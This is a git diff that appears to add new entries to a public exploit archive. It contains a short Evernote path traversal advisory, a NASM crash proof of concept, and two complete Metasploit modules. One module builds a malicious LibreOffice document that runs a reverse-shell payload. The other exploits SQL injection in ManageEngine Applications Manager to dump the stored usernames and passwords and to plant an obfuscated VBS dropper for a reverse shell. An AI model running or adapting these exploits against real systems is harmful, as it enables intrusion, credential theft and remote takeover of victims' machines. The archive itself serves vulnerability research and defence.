diff --git a/exploits/macos/local/46724.txt b/exploits/macos/local/46724.txt
new file mode 100644
index 000000000..4650f1f50
--- /dev/null
+++ b/exploits/macos/local/46724.txt
@@ -0,0 +1,28 @@
+Exploit Title: Code execution via path traversal
+# Date: 17-04-2019
+# Exploit Author: Dhiraj Mishra
+# Vendor Homepage: http://evernote.com/
+# Software Link: https://evernote.com/download
+# Version: 7.9
+# Tested on: macOS Mojave v10.14.4
+# CVE: CVE-2019-10038
+# References:
+# https://nvd.nist.gov/vuln/detail/CVE-2019-10038
+# https://www.inputzero.io/2019/04/evernote-cve-2019-10038.html
+
+Summary:
+A local file path traversal issue exists in Evernote 7.9 for macOS which
+allows an attacker to execute arbitrary programs.
+
+Technical observation:
+A crafted URI can be used in a note to perform this attack using file:///
+has an argument or by traversing to any directory like
+(../../../../something.app).
+
+Since, Evernote also has a feature of sharing notes, in such case attacker
+could leverage this vulnerability and send crafted notes (.enex) to the
+victim to perform any further attack.
+
+Patch:
+The patch for this issue is released in Evernote 7.10 Beta 1 for macOS
+[MACOSNOTE-28840]. Also, the issue is tracked by CVE-2019-10038.
\ No newline at end of file
diff --git a/exploits/multiple/dos/46726.txt b/exploits/multiple/dos/46726.txt
new file mode 100644
index 000000000..67d419104
--- /dev/null
+++ b/exploits/multiple/dos/46726.txt
@@ -0,0 +1,51 @@
+# Exploit Title: Netwide Assembler (NASM) 2.14rc15 NULL Pointer Dereference (PoC)
+# Date: 2018-09-05
+# Exploit Author: Fakhri Zulkifli
+# Vendor Homepage: https://www.nasm.us/
+# Software Link: https://www.nasm.us/pub/nasm/releasebuilds/?C=M;O=D
+# Version: 2.14rc15 and earlier
+# Tested on: 2.14rc15
+# CVE : CVE-2018-16517
+
+asm/labels.c in Netwide Assembler (NASM) is prone to NULL Pointer Dereference, which allows the attacker to cause a denial of service via a crafted file.
+
+PoC:
+1. echo "equ push rax" > poc
+2. nasm -f elf poc
+
+insn_is_label remains FALSE and therefore leaving result->label assigned to NULL which is then dereference in islocal().
+
+ [...]
+
+ if (i == TOKEN_ID || (insn_is_label && i == TOKEN_INSN)) { <-- not taken
+ /* there's a label here */
+ first = false;
+ result->label = tokval.t_charptr;
+ i = stdscan(NULL, &tokval);
+ if (i == ':') { /* skip over the optional colon */
+ i = stdscan(NULL, &tokval);
+ } else if (i == 0) {
+ nasm_error(ERR_WARNING | ERR_WARN_OL | ERR_PASS1,
+ "label alone on a line without a colon might be in error");
+ }
+ if (i != TOKEN_INSN || tokval.t_integer != I_EQU) {
+ /*
+ * FIXME: location.segment could be NO_SEG, in which case
+ * it is possible we should be passing 'absolute.segment'. Look into this.
+ * Work out whether that is *really* what we should be doing.
+ * Generally fix things. I think this is right as it is, but
+ * am still not certain.
+ */
+ define_label(result->label,
+ in_absolute ? absolute.segment : location.segment,
+ location.offset, true);
+ [...]
+
+static bool islocal(const char *l)
+{
+ if (tasm_compatible_mode) {
+ if (l[0] == '@' && l[1] == '@')
+ return true;
+ }
+ return (l[0] == '.' && l[1] != '.'); <-- boom
+}
\ No newline at end of file
diff --git a/exploits/multiple/local/46727.rb b/exploits/multiple/local/46727.rb
new file mode 100755
index 000000000..c0e11a6ce
--- /dev/null
+++ b/exploits/multiple/local/46727.rb
@@ -0,0 +1,115 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+ Rank = NormalRanking
+
+ include Msf::Exploit::FILEFORMAT
+ include Msf::Exploit::Powershell
+ include Msf::Exploit::CmdStager
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'LibreOffice Macro Code Execution',
+ 'Description' => %q{
+ LibreOffice comes bundled with sample macros written in Python and
+ allows the ability to bind program events to them. A macro can be tied
+ to a program event by including the script that contains the macro and
+ the function name to be executed. Additionally, a directory traversal
+ vulnerability exists in the component that references the Python script
+ to be executed. This allows a program event to execute functions from Python
+ scripts relative to the path of the samples macros folder. The pydoc.py script
+ included with LibreOffice contains the tempfilepager function that passes
+ arguments to os.system, allowing RCE.
+
+ This module generates an ODT file with a mouse over event that
+ when triggered, will execute arbitrary code.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'Alex Inführ', # Vulnerability discovery and PoC
+ 'Shelby Pace' # Metasploit Module
+ ],
+ 'References' =>
+ [
+ [ 'CVE', '2018-16858' ],
+ [ 'URL', 'https://insert-script.blogspot.com/2019/02/libreoffice-cve-2018-16858-remote-code.html' ]
+ ],
+ 'Platform' => [ 'win', 'linux' ],
+ 'Arch' => [ ARCH_X86, ARCH_X64 ],
+ 'Targets' =>
+ [
+ [
+ 'Windows',
+ {
+ 'Platform' => 'win',
+ 'Arch' => [ ARCH_X86, ARCH_X64 ],
+ 'Payload' => 'windows/meterpreter/reverse_tcp',
+ 'DefaultOptions' => { 'PrependMigrate' => true }
+ }
+ ],
+ [
+ 'Linux',
+ {
+ 'Platform' => 'linux',
+ 'Arch' => [ ARCH_X86, ARCH_X64 ],
+ 'Payload' => 'linux/x86/meterpreter/reverse_tcp',
+ 'DefaultOptions' => { 'PrependFork' => true },
+ 'CmdStagerFlavor' => 'printf',
+ }
+ ]
+ ],
+ 'DisclosureDate' => "Oct 18, 2018",
+ 'DefaultTarget' => 0
+ ))
+
+ register_options(
+ [
+ OptString.new('FILENAME', [true, 'Output file name', 'librefile.odt'])
+ ])
+ end
+
+ def gen_windows_cmd
+ opts =
+ {
+ :remove_comspec => true,
+ :method => 'reflection',
+ :encode_final_payload => true
+ }
+ @cmd = cmd_psh_payload(payload.encoded, payload_instance.arch.first, opts)
+ @cmd << ' && echo'
+ end
+
+ def gen_linux_cmd
+ @cmd = generate_cmdstager.first
+ @cmd << ' && echo'
+ end
+
+ def gen_file(path)
+ text_content = Rex::Text.rand_text_alpha(10..15)
+
+ # file from Alex Inführ's PoC post referenced above
+ fodt_file = File.read(File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-16858', 'librefile.erb'))
+ libre_file = ERB.new(fodt_file).result(binding())
+ libre_file
+ rescue Errno::ENOENT
+ fail_with(Failure::NotFound, 'Cannot find template file')
+ end
+
+ def exploit
+ path = '../../../program/python-core-3.5.5/lib/pydoc.py'
+ if datastore['TARGET'] == 0
+ gen_windows_cmd
+ elsif datastore['TARGET'] == 1
+ gen_linux_cmd
+ else
+ fail_with(Failure::BadConfig, 'A formal target was not chosen.')
+ end
+ fodt_file = gen_file(path)
+
+ file_create(fodt_file)
+ end
+end
\ No newline at end of file
diff --git a/exploits/windows/remote/46725.rb b/exploits/windows/remote/46725.rb
new file mode 100755
index 000000000..8bb2d9acf
--- /dev/null
+++ b/exploits/windows/remote/46725.rb
@@ -0,0 +1,213 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Exploit::EXE
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => "ManageEngine Applications Manager 11.0 < 14.0 SQL Injection / Remote Code Execution",
+ 'Description' => %q(
+ This module exploits sql and command injection vulnerability in the ManageEngine AM 14 and prior versions.
+ An unauthenticated user can gain the authority of "system" on the server due to SQL injection vulnerability.
+ Exploit allows the writing of the desired file to the system using the postgesql structure.
+ Module is written over the payload by selecting a file with the extension ".vbs" that is used for monitoring
+ by the ManageEngine which working with "system" authority.
+
+ In addition, it dumps the users and passwords from the database for us.
+ Keep in mind! After the harmful ".vbs" file is written, the shell session may be a bit late.
+ Because the ManageEngine application should run this file itself.
+ ),
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'AkkuS <Özkan Mustafa Akkuş>', # Discovery & PoC & Metasploit module @ehakkus
+ ],
+ 'References' =>
+ [
+ ['URL', 'https://pentest.com.tr/exploits/ManageEngine-App-Manager-14-SQLi-Remote-Code-Execution.html']
+ ],
+ 'DefaultOptions' =>
+ {
+ 'WfsDelay' => 500,
+ 'PAYLOAD' => 'windows/shell_reverse_tcp',
+ 'RPORT' => 8443,
+ 'SSL' => true
+ },
+ 'Payload' =>
+ {
+ 'Encoder' => 'x86/shikata_ga_nai'
+ },
+ 'Platform' => ['win'],
+ 'Arch' => [ARCH_X86, ARCH_X64],
+ 'Targets' =>
+ [
+ ['AppManager 14', {}],
+ ['AppManager 13', {}],
+ ['AppManager 12', {}],
+ ['AppManager 11', {}]
+ ],
+ 'Privileged' => true,
+ 'DisclosureDate' => 'Apr 17 2019',
+ 'DefaultTarget' => 1))
+
+ register_options(
+ [
+ OptString.new('TARGETURI', [true, 'The URI of the application', '/'])
+ ]
+ )
+ end
+##
+# Check exploit vulnerability basically // 'Appears' more convenient
+##
+ def check
+ res = inject(Rex::Text.rand_text_alpha(1))
+
+ if res.code = "200" && res.headers['set-cookie'] =~ /JSESSIONID/
+ Exploit::CheckCode::Appears
+ else
+ Exploit::CheckCode::Safe
+ end
+ end
+##
+# VBS payload and Post Data preparation
+##
+ def get_payload
+
+ handler
+ payload = generate_payload_exe
+ @vbs_content = Msf::Util::EXE.to_exe_vbs(payload)
+ ## determining the target directory
+ if target.name == 'AppManager 14'
+ tfile = "AppManager14"
+ elsif target.name == 'AppManager 13'
+ tfile = "AppManager13"
+ elsif target.name == 'AppManager 12'
+ tfile = "AppManager12"
+ elsif target.name == 'AppManager 11'
+ tfile = "AppManager11"
+ end
+
+ fhashes = Rex::Text.rand_text_alpha_lower(8) + ".txt"
+ ## parameters required to read the user table
+ hashes = "sid=1;copy+(select+username,password+from+AM_UserPasswordTable)+to+$$"
+ hashes << "c:\\Program+Files+(x86)\\ManageEngine\\"
+ hashes << "#{tfile}"
+ hashes << "\\working\\"
+ hashes << "#{fhashes}"
+ hashes << "$$;--"
+
+ res = inject("#{hashes}")
+
+ if res.code = "200" && res.headers['set-cookie'] =~ /JSESSIONID/
+ print_good("Users in the database were taken...")
+ res = send_request_cgi({
+ 'method' => 'GET',
+ 'uri' => normalize_uri(target_uri.path, "#{fhashes}") # users file url
+ })
+
+ if res.code == "404"
+ fail_with(Failure::Unreachable, 'The database could not be read!')
+ else
+ print_status("--------------------Usernames and Passwords---------------------")
+ puts res.body # users table output
+ print_status("----------------------------------------------------------------")
+ end
+ else
+ fail_with(Failure::Unreachable, 'Connection error occurred!')
+ end
+
+ ## fetch base64 part in vbs payload
+ pb64 = @vbs_content.split('"
+ Dim')[0].split(' = "')[2]
+ ## vbs file in one line
+ vbs_file = 'On Error Resume Next:Set objWbemLocator = CreateObject("WbemScripting.SWbemLocator"):'
+ vbs_file << 'if Err.Number Then:WScript.Echo vbCrLf & "Error # " & " " & Err.Description:End If:O'
+ vbs_file << 'n Error GoTo 0:On Error Resume Next:Select Case WScript.Arguments.Count:Case 2:strCo'
+ vbs_file << 'mputer = Wscript.Arguments(0):strQuery = Wscript.Arguments(1):Set wbemServices = obj'
+ vbs_file << 'WbemLocator.ConnectServer (strComputer,"Root\\CIMV2"):Case 4:strComputer = Wscript.A'
+ vbs_file << 'rguments(0):strUsername = Wscript.Arguments(1):strPassword = Wscript.Arguments(2):st'
+ vbs_file << 'rQuery = Wscript.Arguments(3):Set wbemServices = objWbemLocator.ConnectServer (strCo'
+ vbs_file << 'mputer,"Root\\CIMV2",strUsername,strPassword):case 6:strComputer = Wscript.Arguments'
+ vbs_file << '(0):strUsername = Wscript.Arguments(1):strPassword = Wscript.Arguments(2):strQuery ='
+ vbs_file << ' Wscript.Arguments(4):namespace = Wscript.Arguments(5):Set wbemServices = objWbemLoca'
+ vbs_file << 'tor.ConnectServer (strComputer,namespace,strUsername,strPassword):Case Else:strMsg ='
+ vbs_file << ' "Error # in parameters passed":WScript.Echo strMsg:WScript.Quit(0):End Select:Set w'
+ vbs_file << 'bemServices = objWbemLocator.ConnectServer (strComputer, namespace, strUsername, str'
+ vbs_file << 'Password):if Err.Number Then:WScript.Echo vbCrLf & "Error # " & " " & Err.Descriptio'
+ vbs_file << 'n:End If:On Error GoTo 0:On Error Resume Next:Set colItems = wbemServices.ExecQuery(s'
+ vbs_file << 'trQuery):if Err.Number Then:WScript.Echo vbCrLf & "Error # " & " " & Err.Description'
+ vbs_file << ':End If:On Error GoTo 0:i=0:For Each objItem in colItems:if i=0 then:header = "":For '
+ vbs_file << 'Each param in objItem.Properties_:header = header & param.Name & vbTab:Next:WScript.E'
+ vbs_file << 'cho header:i=1:end if:serviceData = "":For Each param in objItem.Properties_:serviceD'
+ vbs_file << 'ata = serviceData & param.Value & vbTab:Next:WScript.Echo serviceData:Next:Function b'
+ vbs_file << 'PBdVfYpfCEHF(hBPVZMitxq):HHgwqsqii = "" & hBPVZMitxq & "":Set TInPBSeVlL = CreateObject("MSXML2.DOMDocument'
+ vbs_file << '.3.0"):TInPBSeVlL.LoadXML(HHgwqsqii):bPBdVfYpfCEHF = TInPBSeVlL.selectsinglenode("B64D'
+ vbs_file << 'ECODE").nodeTypedValue:set TInPBSeVlL = nothing:End Function:Function txhYXYJJl():Emkf'
+ vbs_file << 'dMDdusgGha = "'
+ vbs_file << "#{pb64}"
+ vbs_file << '":Dim CCEUdwNSS:Set CCEUdwNSS = CreateObject("Scripting.FileSystemObject"):Dim zhgqIZn'
+ vbs_file << 'K:Dim gnnTqZvAcL:Set zhgqIZnK = CCEUdwNSS.GetSpecialFolder(2):gnnTqZvAcL = zhgqIZnK & '
+ vbs_file << '"\" & CCEUdwNSS.GetTempName():CCEUdwNSS.CreateFolder(gnnTqZvAcL):yZUoLXnPic = gnnTqZvAc'
+ vbs_file << 'L & "\" & "SAEeVSXQVkDEIG.exe":Dim mEciydMZTsoBmAo:Set mEciydMZTsoBmAo = CreateObject("'
+ vbs_file << 'Wscript.Shell"):LXbjZKnEQUfaS = bPBdVfYpfCEHF(EmkfdMDdusgGha):Set TUCiiidRgJQdxTl = Cre'
+ vbs_file << 'ateObject("ADODB.Stream"):TUCiiidRgJQdxTl.Type = 1:TUCiiidRgJQdxTl.Open:TUCiiidRgJQdxT'
+ vbs_file << 'l.Write LXbjZKnEQUfaS:TUCiiidRgJQdxTl.SaveToFile yZUoLXnPic, 2:mEciydMZTsoBmAo.run yZU'
+ vbs_file << 'oLXnPic, 0, true:CCEUdwNSS.DeleteFile(yZUoLXnPic):CCEUdwNSS.DeleteFolder(gnnTqZvAcL):E'
+ vbs_file << 'nd Function:txhYXYJJl:WScript.Quit(0)'
+ ## encode the vbs file to base64 and then encode the url-hex
+ encoding_vbs = Rex::Text.uri_encode(Rex::Text.encode_base64(vbs_file), 'hex-all')
+
+ ## post preparation // creating and writing files on the server with SQLi
+ vbs_payload = "sid=1;copy+(select+convert_from(decode($$#{encoding_vbs}$$,$$base64$$)"
+ vbs_payload << ",$$utf-8$$))+to+$$C:\\\\Program+Files+(x86)\\\\ManageEngine\\\\"
+ vbs_payload << "#{tfile}"
+ vbs_payload << "\\\\working\\\\conf\\\\application\\\\scripts\\\\wmiget.vbs$$;"
+
+ res = inject("#{vbs_payload}")
+
+ if res.code = "200" && res.headers['set-cookie'] =~ /JSESSIONID/
+ print_good("The harmful .vbs file was successfully written to the server.")
+ print_status("Keep in mind! You may have to wait between 10-300 seconds for the shell session.")
+ else
+ fail_with(Failure::Unreachable, 'Connection error occurred!')
+ end
+
+ return payload
+ end
+##
+# Call functions
+##
+ def exploit
+ unless Exploit::CheckCode::Appears == check
+ fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
+ end
+ print_status("Payload is preparing...")
+ get_payload
+
+ end
+##
+# Inj payload
+##
+ def inject(payload)
+
+ res = send_request_cgi(
+ {
+ 'method' => 'POST',
+ 'ctype' => 'application/x-www-form-urlencoded',
+ 'uri' => normalize_uri(target_uri.path, '/jsp/Popup_SLA.jsp'),
+ 'data' => payload
+ }, 25)
+
+ end
+end
+##
+# The end of the adventure (o_O) // AkkuS
+##
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 999951063..3e83dcf72 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -6391,6 +6391,7 @@ id,file,description,date,author,type,platform,port
46721,exploits/windows/dos/46721.py,"DHCP Server 2.5.2 - Denial of Service (PoC)",2019-04-17,"Victor Mondragón",dos,windows,
46722,exploits/multiple/dos/46722.txt,"Oracle Java Runtime Environment - Heap Corruption During TTF font Rendering in sc_FindExtrema4",2019-04-17,"Google Security Research",dos,multiple,
46723,exploits/multiple/dos/46723.txt,"Oracle Java Runtime Environment - Heap Corruption During TTF font Rendering in GlyphIterator::setCurrGlyphID",2019-04-17,"Google Security Research",dos,multiple,
+46726,exploits/multiple/dos/46726.txt,"Netwide Assembler (NASM) 2.14rc15 - NULL Pointer Dereference (PoC)",2019-04-18,"Fakhri Zulkifli",dos,multiple,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -10417,6 +10418,7 @@ id,file,description,date,author,type,platform,port
46688,exploits/windows/local/46688.txt,"CyberArk EPM 10.2.1.603 - Security Restrictions Bypass",2019-04-12,"Alpcan Onaran",local,windows,
46690,exploits/windows/local/46690.txt,"Microsoft Internet Explorer 11 - XML External Entity Injection",2019-04-12,hyp3rlinx,local,windows,
46692,exploits/windows/local/46692.rb,"Microsoft Windows - Contact File Format Arbitary Code Execution (Metasploit)",2019-04-12,Metasploit,local,windows,
+46724,exploits/macos/local/46724.txt,"Evernote 7.9 - Code Execution via Path Traversal",2019-04-18,"Dhiraj Mishra",local,macos,
46707,exploits/windows/local/46707.txt,"Zoho ManageEngine ADManager Plus 6.6 (Build < 6659) - Privilege Escalation",2019-04-16,"Digital Interruption",local,windows,
46712,exploits/windows/local/46712.txt,"Microsoft Windows 10 1809 / 1709 - CSRSS SxSSrv Cached Manifest Privilege Escalation",2019-04-16,"Google Security Research",local,windows,
46713,exploits/windows/local/46713.txt,"Microsoft Windows 10 1809 - LUAFV Delayed Virtualization MAXIMUM_ACCESS DesiredAccess Privilege Escalation",2019-04-16,"Google Security Research",local,windows,
@@ -10425,6 +10427,7 @@ id,file,description,date,author,type,platform,port
46716,exploits/windows/local/46716.txt,"Microsoft Windows 10 1809 - LUAFV NtSetCachedSigningLevel Device Guard Bypass",2019-04-16,"Google Security Research",local,windows,
46717,exploits/windows/local/46717.txt,"Microsoft Windows 10 1809 - LUAFV Delayed Virtualization Cache Manager Poisoning Privilege Escalation",2019-04-16,"Google Security Research",local,windows,
46718,exploits/windows/local/46718.txt,"Microsoft Windows 10 1809 - LUAFV PostLuafvPostReadWrite SECTION_OBJECT_POINTERS Race Condition Privilege Escalation",2019-04-16,"Google Security Research",local,windows,
+46727,exploits/multiple/local/46727.rb,"LibreOffice < 6.0.7 / 6.1.3 - Macro Code Execution (Metasploit)",2019-04-18,Metasploit,local,multiple,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -17340,6 +17343,7 @@ id,file,description,date,author,type,platform,port
46701,exploits/windows/remote/46701.py,"MailCarrier 2.51 - POP3 'TOP' SEH Buffer Overflow",2019-04-15,"Dino Covotsos",remote,windows,110
46705,exploits/hardware/remote/46705.rb,"Cisco RV130W Routers - Management Interface Remote Command Execution (Metasploit)",2019-04-15,Metasploit,remote,hardware,
46719,exploits/windows/remote/46719.py,"MailCarrier 2.51 - POP3 'RETR' SEH Buffer Overflow",2019-04-17,"Dino Covotsos",remote,windows,110
+46725,exploits/windows/remote/46725.rb,"ManageEngine Applications Manager 11.0 < 14.0 - SQL Injection / Remote Code Execution (Metasploit)",2019-04-18,AkkuS,remote,windows,
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
diff --git a/shellcodes/generator/46696.py b/shellcodes/generator/46696.py
index 007d62403..f6b24db11 100755
--- a/shellcodes/generator/46696.py
+++ b/shellcodes/generator/46696.py
@@ -96,14 +96,4 @@ main()
printf("Shellcode Length: %d\n", strlen(code));
int (*CodeFun)() = (int(*)())code;
CodeFun();
-}
-
-################################################################################
-
-
-Kind Regards
-------------------------------
-
-Bc. Petr Javorik
-www.mmquant.net
- maple@mmquant.net
\ No newline at end of file
+}
\ No newline at end of file